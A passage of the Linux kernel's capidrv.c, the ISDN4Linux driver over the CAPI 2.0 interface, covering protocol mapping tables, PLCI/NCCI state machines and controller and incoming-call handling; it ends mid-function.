/* $Id: capidrv.c,v 1.1.2.2 2004/01/12 23:17:24 keil Exp $
*
* ISDN4Linux Driver, using capi20 interface (kernelcapi)
*
* Copyright 1997 by Carsten Paeth <[email protected]>
*
* This software may be used and distributed according to the terms
* of the GNU General Public License, incorporated herein by reference.
*
*/
#include <linux/module.h>
#include <linux/errno.h>
#include <linux/kernel.h>
#include <linux/major.h>
#include <linux/slab.h>
#include <linux/fcntl.h>
#include <linux/fs.h>
#include <linux/signal.h>
#include <linux/mm.h>
#include <linux/timer.h>
#include <linux/wait.h>
#include <linux/skbuff.h>
#include <linux/isdn.h>
#include <linux/isdnif.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/capi.h>
#include <linux/kernelcapi.h>
#include <linux/ctype.h>
#include <linux/init.h>
#include <linux/moduleparam.h>
#include <linux/isdn/capiutil.h>
#include <linux/isdn/capicmd.h>
#include "capidrv.h"
static int debugmode = 0;
MODULE_DESCRIPTION("CAPI4Linux: Interface to ISDN4Linux");
MODULE_AUTHOR("Carsten Paeth");
MODULE_LICENSE("GPL");
module_param(debugmode, uint, S_IRUGO | S_IWUSR);
/* -------- type definitions ----------------------------------------- */
struct capidrv_contr {
struct capidrv_contr *next;
struct module *owner;
u32 contrnr;
char name[20];
/*
* for isdn4linux
*/
isdn_if interface;
int myid;
/*
* LISTEN state
*/
int state;
u32 cipmask;
u32 cipmask2;
struct timer_list listentimer;
/*
* ID of capi message sent
*/
u16 msgid;
/*
* B-Channels
*/
int nbchan;
struct capidrv_bchan {
struct capidrv_contr *contr;
u8 msn[ISDN_MSNLEN];
int l2;
int l3;
u8 num[ISDN_MSNLEN];
u8 mynum[ISDN_MSNLEN];
int si1;
int si2;
int incoming;
int disconnecting;
struct capidrv_plci {
struct capidrv_plci *next;
u32 plci;
u32 ncci; /* ncci for CONNECT_ACTIVE_IND */
u16 msgid; /* to identify CONNECT_CONF */
int chan;
int state;
int leasedline;
struct capidrv_ncci {
struct capidrv_ncci *next;
struct capidrv_plci *plcip;
u32 ncci;
u16 msgid; /* to identify CONNECT_B3_CONF */
int chan;
int state;
int oldstate;
/* */
u16 datahandle;
struct ncci_datahandle_queue {
struct ncci_datahandle_queue *next;
u16 datahandle;
int len;
} *ackqueue;
} *ncci_list;
} *plcip;
struct capidrv_ncci *nccip;
} *bchans;
struct capidrv_plci *plci_list;
/* for q931 data */
u8 q931_buf[4096];
u8 *q931_read;
u8 *q931_write;
u8 *q931_end;
};
struct capidrv_data {
struct capi20_appl ap;
int ncontr;
struct capidrv_contr *contr_list;
};
typedef struct capidrv_plci capidrv_plci;
typedef struct capidrv_ncci capidrv_ncci;
typedef struct capidrv_contr capidrv_contr;
typedef struct capidrv_data capidrv_data;
typedef struct capidrv_bchan capidrv_bchan;
/* -------- data definitions ----------------------------------------- */
static capidrv_data global;
static DEFINE_SPINLOCK(global_lock);
static void handle_dtrace_data(capidrv_contr *card,
int send, int level2, u8 *data, u16 len);
/* -------- convert functions ---------------------------------------- */
static inline u32 b1prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
return 0;
case ISDN_PROTO_L2_HDLC:
default:
return 0;
case ISDN_PROTO_L2_TRANS:
return 1;
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
return 2;
case ISDN_PROTO_L2_FAX:
return 4;
case ISDN_PROTO_L2_MODEM:
return 8;
}
}
static inline u32 b2prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
default:
return 0;
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
case ISDN_PROTO_L2_MODEM:
return 1;
case ISDN_PROTO_L2_FAX:
return 4;
}
}
static inline u32 b3prot(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
case ISDN_PROTO_L2_V11096:
case ISDN_PROTO_L2_V11019:
case ISDN_PROTO_L2_V11038:
case ISDN_PROTO_L2_MODEM:
default:
return 0;
case ISDN_PROTO_L2_FAX:
return 4;
}
}
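/*
 * Taken together, b1prot/b2prot/b3prot map one isdn4linux layer-2 setting
 * onto a CAPI B1/B2/B3 protocol stack; e.g. ISDN_PROTO_L2_TRANS yields
 * (1, 1, 0): bit-transparent B1, transparent B2, transparent B3.
 */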
static _cstruct b1config_async_v110(u16 rate)
{
/* CAPI-Spec "B1 Configuration" */
static unsigned char buf[9];
buf[0] = 8; /* len */
/* maximum bitrate */
buf[1] = rate & 0xff; buf[2] = (rate >> 8) & 0xff;
buf[3] = 8; buf[4] = 0; /* 8 bits per character */
buf[5] = 0; buf[6] = 0; /* parity none */
buf[7] = 0; buf[8] = 0; /* 1 stop bit */
return buf;
}
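/*
 * Worked example: rate = 9600 (0x2580) produces
 * buf = { 8, 0x80, 0x25, 8, 0, 0, 0, 0, 0 }
 * i.e. length 8, little-endian bitrate, 8 data bits, no parity,
 * one stop bit, per the "B1 Configuration" layout cited above.
 */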
static _cstruct b1config(int l2, int l3)
{
switch (l2) {
case ISDN_PROTO_L2_X75I:
case ISDN_PROTO_L2_X75UI:
case ISDN_PROTO_L2_X75BUI:
case ISDN_PROTO_L2_HDLC:
case ISDN_PROTO_L2_TRANS:
default:
return NULL;
case ISDN_PROTO_L2_V11096:
return b1config_async_v110(9600);
case ISDN_PROTO_L2_V11019:
return b1config_async_v110(19200);
case ISDN_PROTO_L2_V11038:
return b1config_async_v110(38400);
}
}
static inline u16 si2cip(u8 si1, u8 si2)
{
static const u8 cip[17][5] =
{
/* 0 1 2 3 4 */
{0, 0, 0, 0, 0}, /*0 */
{16, 16, 4, 26, 16}, /*1 */
{17, 17, 17, 4, 4}, /*2 */
{2, 2, 2, 2, 2}, /*3 */
{18, 18, 18, 18, 18}, /*4 */
{2, 2, 2, 2, 2}, /*5 */
{0, 0, 0, 0, 0}, /*6 */
{2, 2, 2, 2, 2}, /*7 */
{2, 2, 2, 2, 2}, /*8 */
{21, 21, 21, 21, 21}, /*9 */
{19, 19, 19, 19, 19}, /*10 */
{0, 0, 0, 0, 0}, /*11 */
{0, 0, 0, 0, 0}, /*12 */
{0, 0, 0, 0, 0}, /*13 */
{0, 0, 0, 0, 0}, /*14 */
{22, 22, 22, 22, 22}, /*15 */
{27, 27, 27, 28, 27} /*16 */
};
if (si1 > 16)
si1 = 0;
if (si2 > 4)
si2 = 0;
return (u16) cip[si1][si2];
}
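/*
 * Example: an analog telephony call (si1 = 1, si2 = 0) maps to CIP 16,
 * while a data call (si1 = 7, si2 = 0) maps to CIP 2 (unrestricted
 * digital information); cip2si1()/cip2si2() below invert the mapping
 * for incoming calls.
 */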
static inline u8 cip2si1(u16 cipval)
{
static const u8 si[32] =
{7, 1, 7, 7, 1, 1, 7, 7, /*0-7 */
7, 1, 0, 0, 0, 0, 0, 0, /*8-15 */
1, 2, 4, 10, 9, 9, 15, 7, /*16-23 */
7, 7, 1, 16, 16, 0, 0, 0}; /*24-31 */
if (cipval > 31)
cipval = 0; /* out of range, treat as unknown */
return si[cipval];
}
static inline u8 cip2si2(u16 cipval)
{
static const u8 si[32] =
{0, 0, 0, 0, 2, 3, 0, 0, /*0-7 */
0, 3, 0, 0, 0, 0, 0, 0, /*8-15 */
1, 2, 0, 0, 9, 0, 0, 0, /*16-23 */
0, 0, 3, 2, 3, 0, 0, 0}; /*24-31 */
if (cipval > 31)
cipval = 0; /* out of range, treat as unknown */
return si[cipval];
}
/* -------- controller management ------------------------------------- */
static inline capidrv_contr *findcontrbydriverid(int driverid)
{
unsigned long flags;
capidrv_contr *p;
spin_lock_irqsave(&global_lock, flags);
for (p = global.contr_list; p; p = p->next)
if (p->myid == driverid)
break;
spin_unlock_irqrestore(&global_lock, flags);
return p;
}
static capidrv_contr *findcontrbynumber(u32 contr)
{
unsigned long flags;
capidrv_contr *p;
spin_lock_irqsave(&global_lock, flags);
for (p = global.contr_list; p; p = p->next)
if (p->contrnr == contr)
break;
spin_unlock_irqrestore(&global_lock, flags);
return p;
}
/* -------- plci management ------------------------------------------ */
static capidrv_plci *new_plci(capidrv_contr *card, int chan)
{
capidrv_plci *plcip;
plcip = kzalloc(sizeof(capidrv_plci), GFP_ATOMIC);
if (plcip == NULL)
return NULL;
plcip->state = ST_PLCI_NONE;
plcip->plci = 0;
plcip->msgid = 0;
plcip->chan = chan;
plcip->next = card->plci_list;
card->plci_list = plcip;
card->bchans[chan].plcip = plcip;
return plcip;
}
static capidrv_plci *find_plci_by_plci(capidrv_contr *card, u32 plci)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->plci == plci)
return p;
return NULL;
}
static capidrv_plci *find_plci_by_msgid(capidrv_contr *card, u16 msgid)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->msgid == msgid)
return p;
return NULL;
}
static capidrv_plci *find_plci_by_ncci(capidrv_contr *card, u32 ncci)
{
capidrv_plci *p;
for (p = card->plci_list; p; p = p->next)
if (p->plci == (ncci & 0xffff))
return p;
return NULL;
}
static void free_plci(capidrv_contr *card, capidrv_plci *plcip)
{
capidrv_plci **pp;
for (pp = &card->plci_list; *pp; pp = &(*pp)->next) {
if (*pp == plcip) {
*pp = (*pp)->next;
card->bchans[plcip->chan].plcip = NULL;
card->bchans[plcip->chan].disconnecting = 0;
card->bchans[plcip->chan].incoming = 0;
kfree(plcip);
return;
}
}
printk(KERN_ERR "capidrv-%d: free_plci %p (0x%x) not found, Huh?\n",
card->contrnr, plcip, plcip->plci);
}
/* -------- ncci management ------------------------------------------ */
static inline capidrv_ncci *new_ncci(capidrv_contr *card,
capidrv_plci *plcip,
u32 ncci)
{
capidrv_ncci *nccip;
nccip = kzalloc(sizeof(capidrv_ncci), GFP_ATOMIC);
if (nccip == NULL)
return NULL;
nccip->ncci = ncci;
nccip->state = ST_NCCI_NONE;
nccip->plcip = plcip;
nccip->chan = plcip->chan;
nccip->datahandle = 0;
nccip->next = plcip->ncci_list;
plcip->ncci_list = nccip;
card->bchans[plcip->chan].nccip = nccip;
return nccip;
}
static inline capidrv_ncci *find_ncci(capidrv_contr *card, u32 ncci)
{
capidrv_plci *plcip;
capidrv_ncci *p;
if ((plcip = find_plci_by_ncci(card, ncci)) == NULL)
return NULL;
for (p = plcip->ncci_list; p; p = p->next)
if (p->ncci == ncci)
return p;
return NULL;
}
static inline capidrv_ncci *find_ncci_by_msgid(capidrv_contr *card,
u32 ncci, u16 msgid)
{
capidrv_plci *plcip;
capidrv_ncci *p;
if ((plcip = find_plci_by_ncci(card, ncci)) == NULL)
return NULL;
for (p = plcip->ncci_list; p; p = p->next)
if (p->msgid == msgid)
return p;
return NULL;
}
static void free_ncci(capidrv_contr *card, struct capidrv_ncci *nccip)
{
struct capidrv_ncci **pp;
for (pp = &(nccip->plcip->ncci_list); *pp; pp = &(*pp)->next) {
if (*pp == nccip) {
*pp = (*pp)->next;
break;
}
}
card->bchans[nccip->chan].nccip = NULL;
kfree(nccip);
}
static int capidrv_add_ack(struct capidrv_ncci *nccip,
u16 datahandle, int len)
{
struct ncci_datahandle_queue *n, **pp;
n = kmalloc(sizeof(struct ncci_datahandle_queue), GFP_ATOMIC);
if (!n) {
printk(KERN_ERR "capidrv: kmalloc ncci_datahandle failed\n");
return -1;
}
n->next = NULL;
n->datahandle = datahandle;
n->len = len;
for (pp = &nccip->ackqueue; *pp; pp = &(*pp)->next);
*pp = n;
return 0;
}
static int capidrv_del_ack(struct capidrv_ncci *nccip, u16 datahandle)
{
struct ncci_datahandle_queue **pp, *p;
int len;
for (pp = &nccip->ackqueue; *pp; pp = &(*pp)->next) {
if ((*pp)->datahandle == datahandle) {
p = *pp;
len = p->len;
*pp = (*pp)->next;
kfree(p);
return len;
}
}
return -1;
}
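/*
 * The ack queue is a per-NCCI FIFO: if_sendbuf() appends an entry for each
 * DATA_B3_REQ it issues, and the DATA_B3_CONF handler removes it again via
 * capidrv_del_ack(), using the returned length to report ISDN_STAT_BSENT
 * upstream; -1 signals an unknown datahandle.
 */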
/* -------- convert and send capi message ---------------------------- */
static void send_message(capidrv_contr *card, _cmsg *cmsg)
{
struct sk_buff *skb;
size_t len;
capi_cmsg2message(cmsg, cmsg->buf);
len = CAPIMSG_LEN(cmsg->buf);
skb = alloc_skb(len, GFP_ATOMIC);
if (!skb) {
printk(KERN_ERR "capidrv::send_message: can't allocate mem\n");
return;
}
memcpy(skb_put(skb, len), cmsg->buf, len);
if (capi20_put_message(&global.ap, skb) != CAPI_NOERROR)
kfree_skb(skb);
}
/* -------- state machine -------------------------------------------- */
struct listenstatechange {
int actstate;
int nextstate;
int event;
};
static struct listenstatechange listentable[] =
{
{ST_LISTEN_NONE, ST_LISTEN_WAIT_CONF, EV_LISTEN_REQ},
{ST_LISTEN_ACTIVE, ST_LISTEN_ACTIVE_WAIT_CONF, EV_LISTEN_REQ},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_ERROR},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_ERROR},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_EMPTY},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_NONE, EV_LISTEN_CONF_EMPTY},
{ST_LISTEN_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_OK},
{ST_LISTEN_ACTIVE_WAIT_CONF, ST_LISTEN_ACTIVE, EV_LISTEN_CONF_OK},
{},
};
static void listen_change_state(capidrv_contr *card, int event)
{
struct listenstatechange *p = listentable;
while (p->event) {
if (card->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: listen_change_state %d -> %d\n",
card->contrnr, card->state, p->nextstate);
card->state = p->nextstate;
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: listen_change_state state=%d event=%d ????\n",
card->contrnr, card->state, event);
}
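/*
 * Example transition: send_listen() raises EV_LISTEN_REQ, moving a card
 * from ST_LISTEN_NONE to ST_LISTEN_WAIT_CONF; the LISTEN_CONF handler then
 * resolves that to ST_LISTEN_ACTIVE, or back to ST_LISTEN_NONE on error or
 * an empty CIP mask, per the table above.
 */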
/* ------------------------------------------------------------------ */
static void p0(capidrv_contr *card, capidrv_plci *plci)
{
isdn_ctrl cmd;
card->bchans[plci->chan].contr = NULL;
cmd.command = ISDN_STAT_DHUP;
cmd.driver = card->myid;
cmd.arg = plci->chan;
card->interface.statcallb(&cmd);
free_plci(card, plci);
}
/* ------------------------------------------------------------------ */
struct plcistatechange {
int actstate;
int nextstate;
int event;
void (*changefunc)(capidrv_contr *card, capidrv_plci *plci);
};
static struct plcistatechange plcitable[] =
{
/* P-0 */
{ST_PLCI_NONE, ST_PLCI_OUTGOING, EV_PLCI_CONNECT_REQ, NULL},
{ST_PLCI_NONE, ST_PLCI_ALLOCATED, EV_PLCI_FACILITY_IND_UP, NULL},
{ST_PLCI_NONE, ST_PLCI_INCOMING, EV_PLCI_CONNECT_IND, NULL},
{ST_PLCI_NONE, ST_PLCI_RESUMEING, EV_PLCI_RESUME_REQ, NULL},
/* P-0.1 */
{ST_PLCI_OUTGOING, ST_PLCI_NONE, EV_PLCI_CONNECT_CONF_ERROR, p0},
{ST_PLCI_OUTGOING, ST_PLCI_ALLOCATED, EV_PLCI_CONNECT_CONF_OK, NULL},
/* P-1 */
{ST_PLCI_ALLOCATED, ST_PLCI_ACTIVE, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ALLOCATED, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-ACT */
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_HELD, EV_PLCI_HOLD_IND, NULL},
{ST_PLCI_ACTIVE, ST_PLCI_DISCONNECTING, EV_PLCI_SUSPEND_IND, NULL},
/* P-2 */
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_CONNECT_REJECT, NULL},
{ST_PLCI_INCOMING, ST_PLCI_FACILITY_IND, EV_PLCI_FACILITY_IND_UP, NULL},
{ST_PLCI_INCOMING, ST_PLCI_ACCEPTING, EV_PLCI_CONNECT_RESP, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
{ST_PLCI_INCOMING, ST_PLCI_DISCONNECTING, EV_PLCI_CD_IND, NULL},
/* P-3 */
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_CONNECT_REJECT, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_ACCEPTING, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_FACILITY_IND, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-4 */
{ST_PLCI_ACCEPTING, ST_PLCI_ACTIVE, EV_PLCI_CONNECT_ACTIVE_IND, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTING, EV_PLCI_DISCONNECT_REQ, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTING, EV_PLCI_FACILITY_IND_DOWN, NULL},
{ST_PLCI_ACCEPTING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-5 */
{ST_PLCI_DISCONNECTING, ST_PLCI_DISCONNECTED, EV_PLCI_DISCONNECT_IND, NULL},
/* P-6 */
{ST_PLCI_DISCONNECTED, ST_PLCI_NONE, EV_PLCI_DISCONNECT_RESP, p0},
/* P-0.Res */
{ST_PLCI_RESUMEING, ST_PLCI_NONE, EV_PLCI_RESUME_CONF_ERROR, p0},
{ST_PLCI_RESUMEING, ST_PLCI_RESUME, EV_PLCI_RESUME_CONF_OK, NULL},
/* P-RES */
{ST_PLCI_RESUME, ST_PLCI_ACTIVE, EV_PLCI_RESUME_IND, NULL},
/* P-HELD */
{ST_PLCI_HELD, ST_PLCI_ACTIVE, EV_PLCI_RETRIEVE_IND, NULL},
{},
};
static void plci_change_state(capidrv_contr *card, capidrv_plci *plci, int event)
{
struct plcistatechange *p = plcitable;
while (p->event) {
if (plci->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: plci_change_state:0x%x %d -> %d\n",
card->contrnr, plci->plci, plci->state, p->nextstate);
plci->state = p->nextstate;
if (p->changefunc)
p->changefunc(card, plci);
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: plci_change_state:0x%x state=%d event=%d ????\n",
card->contrnr, plci->plci, plci->state, event);
}
/* ------------------------------------------------------------------ */
static _cmsg cmsg;
static void n0(capidrv_contr *card, capidrv_ncci *ncci)
{
isdn_ctrl cmd;
capi_fill_DISCONNECT_REQ(&cmsg,
global.ap.applid,
card->msgid++,
ncci->plcip->plci,
NULL, /* BChannelinformation */
NULL, /* Keypadfacility */
NULL, /* Useruserdata */ /* $$$$ */
NULL /* Facilitydataarray */
);
plci_change_state(card, ncci->plcip, EV_PLCI_DISCONNECT_REQ);
send_message(card, &cmsg);
cmd.command = ISDN_STAT_BHUP;
cmd.driver = card->myid;
cmd.arg = ncci->chan;
card->interface.statcallb(&cmd);
free_ncci(card, ncci);
}
/* ------------------------------------------------------------------ */
struct nccistatechange {
int actstate;
int nextstate;
int event;
void (*changefunc)(capidrv_contr *card, capidrv_ncci *ncci);
};
static struct nccistatechange nccitable[] =
{
/* N-0 */
{ST_NCCI_NONE, ST_NCCI_OUTGOING, EV_NCCI_CONNECT_B3_REQ, NULL},
{ST_NCCI_NONE, ST_NCCI_INCOMING, EV_NCCI_CONNECT_B3_IND, NULL},
/* N-0.1 */
{ST_NCCI_OUTGOING, ST_NCCI_ALLOCATED, EV_NCCI_CONNECT_B3_CONF_OK, NULL},
{ST_NCCI_OUTGOING, ST_NCCI_NONE, EV_NCCI_CONNECT_B3_CONF_ERROR, n0},
/* N-1 */
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTING, EV_NCCI_CONNECT_B3_REJECT, NULL},
{ST_NCCI_INCOMING, ST_NCCI_ALLOCATED, EV_NCCI_CONNECT_B3_RESP, NULL},
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_INCOMING, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-2 */
{ST_NCCI_ALLOCATED, ST_NCCI_ACTIVE, EV_NCCI_CONNECT_B3_ACTIVE_IND, NULL},
{ST_NCCI_ALLOCATED, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_ALLOCATED, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-ACT */
{ST_NCCI_ACTIVE, ST_NCCI_ACTIVE, EV_NCCI_RESET_B3_IND, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_RESETING, EV_NCCI_RESET_B3_REQ, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_ACTIVE, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-3 */
{ST_NCCI_RESETING, ST_NCCI_ACTIVE, EV_NCCI_RESET_B3_IND, NULL},
{ST_NCCI_RESETING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_RESETING, ST_NCCI_DISCONNECTING, EV_NCCI_DISCONNECT_B3_REQ, NULL},
/* N-4 */
{ST_NCCI_DISCONNECTING, ST_NCCI_DISCONNECTED, EV_NCCI_DISCONNECT_B3_IND, NULL},
{ST_NCCI_DISCONNECTING, ST_NCCI_PREVIOUS, EV_NCCI_DISCONNECT_B3_CONF_ERROR, NULL},
/* N-5 */
{ST_NCCI_DISCONNECTED, ST_NCCI_NONE, EV_NCCI_DISCONNECT_B3_RESP, n0},
{},
};
static void ncci_change_state(capidrv_contr *card, capidrv_ncci *ncci, int event)
{
struct nccistatechange *p = nccitable;
while (p->event) {
if (ncci->state == p->actstate && p->event == event) {
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: ncci_change_state:0x%x %d -> %d\n",
card->contrnr, ncci->ncci, ncci->state, p->nextstate);
if (p->nextstate == ST_NCCI_PREVIOUS) {
ncci->state = ncci->oldstate;
ncci->oldstate = p->actstate;
} else {
ncci->oldstate = p->actstate;
ncci->state = p->nextstate;
}
if (p->changefunc)
p->changefunc(card, ncci);
return;
}
p++;
}
printk(KERN_ERR "capidrv-%d: ncci_change_state:0x%x state=%d event=%d ????\n",
card->contrnr, ncci->ncci, ncci->state, event);
}
/* ------------------------------------------------------------------- */
static inline int new_bchan(capidrv_contr *card)
{
int i;
for (i = 0; i < card->nbchan; i++) {
if (card->bchans[i].plcip == NULL) {
card->bchans[i].disconnecting = 0;
return i;
}
}
return -1;
}
/* ------------------------------------------------------------------- */
static void handle_controller(_cmsg *cmsg)
{
capidrv_contr *card = findcontrbynumber(cmsg->adr.adrController & 0x7f);
if (!card) {
printk(KERN_ERR "capidrv: %s from unknown controller 0x%x\n",
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController & 0x7f);
return;
}
switch (CAPICMD(cmsg->Command, cmsg->Subcommand)) {
case CAPI_LISTEN_CONF: /* Controller */
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: listenconf Info=0x%4x (%s) cipmask=0x%x\n",
card->contrnr, cmsg->Info, capi_info2str(cmsg->Info), card->cipmask);
if (cmsg->Info) {
listen_change_state(card, EV_LISTEN_CONF_ERROR);
} else if (card->cipmask == 0) {
listen_change_state(card, EV_LISTEN_CONF_EMPTY);
} else {
listen_change_state(card, EV_LISTEN_CONF_OK);
}
break;
case CAPI_MANUFACTURER_IND: /* Controller */
if (cmsg->ManuID == 0x214D5641
&& cmsg->Class == 0
&& cmsg->Function == 1) {
u8 *data = cmsg->ManuData + 3;
u16 len = cmsg->ManuData[0];
u16 layer;
int direction;
if (len == 255) {
len = (cmsg->ManuData[1] | (cmsg->ManuData[2] << 8));
data += 2;
}
len -= 2;
layer = ((*(data - 1)) << 8) | *(data - 2);
if (layer & 0x300)
direction = (layer & 0x200) ? 0 : 1;
else direction = (layer & 0x800) ? 0 : 1;
if (layer & 0x0C00) {
if ((layer & 0xff) == 0x80) {
handle_dtrace_data(card, direction, 1, data, len);
break;
}
} else if ((layer & 0xff) < 0x80) {
handle_dtrace_data(card, direction, 0, data, len);
break;
}
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x layer 0x%x, ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController, layer);
break;
}
goto ignored;
case CAPI_MANUFACTURER_CONF: /* Controller */
if (cmsg->ManuID == 0x214D5641) {
char *s = NULL;
switch (cmsg->Class) {
case 0: break;
case 1: s = "unknown class"; break;
case 2: s = "unknown function"; break;
default: s = "unknown error"; break;
}
if (s)
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x function %d: %s\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController,
cmsg->Function, s);
break;
}
goto ignored;
case CAPI_FACILITY_IND: /* Controller/plci/ncci */
goto ignored;
case CAPI_FACILITY_CONF: /* Controller/plci/ncci */
goto ignored;
case CAPI_INFO_IND: /* Controller/plci */
goto ignored;
case CAPI_INFO_CONF: /* Controller/plci */
goto ignored;
default:
printk(KERN_ERR "capidrv-%d: got %s from controller 0x%x ???",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController);
}
return;
ignored:
printk(KERN_INFO "capidrv-%d: %s from controller 0x%x ignored\n",
card->contrnr,
capi_cmd2str(cmsg->Command, cmsg->Subcommand),
cmsg->adr.adrController);
}
static void handle_incoming_call(capidrv_contr *card, _cmsg *cmsg)
{
capidrv_plci *plcip;
capidrv_bchan *bchan;
isdn_ctrl cmd;
int chan;
if ((chan = new_bchan(card)) == -1) {
printk(KERN_ERR "capidrv-%d: incoming call on not existing bchan ?\n", card->contrnr);
return;
}
bchan = &card->bchans[chan];
if ((plcip = new_plci(card, chan)) == NULL) {
printk(KERN_ERR "capidrv-%d: incoming call: no memory, sorry.\n", card->contrnr);
return;
}
bchan->incoming = 1;
plcip->plci = cmsg->adr.adrPLCI;
plci_change_state(card, plcip, EV_PLCI_CONNECT_IND);
cmd.command = ISDN_STAT_ICALL;
cmd.driver = card->myid;
cmd.arg = chan;
memset(&cmd.parm.setup, 0, sizeof(cmd.parm.setup));
strncpy(cmd.parm.setup.phone,
cmsg->CallingPartyNumber + 3,
cmsg->CallingPartyNumber[0] - 2);
strncpy(cmd.parm.setup.eazmsn,
cmsg->CalledPartyNumber + 2,
cmsg->CalledPartyNumber[0] - 1);
cmd.parm.setup.si1 = cip2si1(cmsg->CIPValue);
cmd.parm.setup.si2 = cip2si2(cmsg->CIPValue);
cmd.parm.setup.plan = cmsg->CallingPartyNumber[1];
cmd.parm.setup.screen = cmsg->CallingPartyNumber[2];
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
if (cmd.parm.setup.si1 == 1 && cmd.parm.setup.si2 != 0) {
printk(KERN_INFO "capidrv-%d: patching si2=%d to 0 for VBOX\n",
card->contrnr,
cmd.parm.setup.si2);
cmd.parm.setup.si2 = 0;
}
switch (card->interface.statcallb(&cmd)) {
case 0:
case 3:
/* No device is matching this call,
* and isdn_common.c has sent a HANGUP command,
* which is ignored in state ST_PLCI_INCOMING,
* so we send a RESP to ignore the call.
*/
capi_cmsg_answer(cmsg);
cmsg->Reject = 1; /* ignore */
plci_change_state(card, plcip, EV_PLCI_CONNECT_REJECT);
send_message(card, cmsg);
printk(KERN_INFO "capidrv-%d: incoming call %s,%d,%d,%s ignored\n",
card->contrnr,
cmd.parm.setup.phone,
cmd.parm.setup.si1,
cmd.parm.setup.si2,
cmd.parm.setup.eazmsn);
break;
case 1:
/* At least one device matched this call (RING on ttyI);
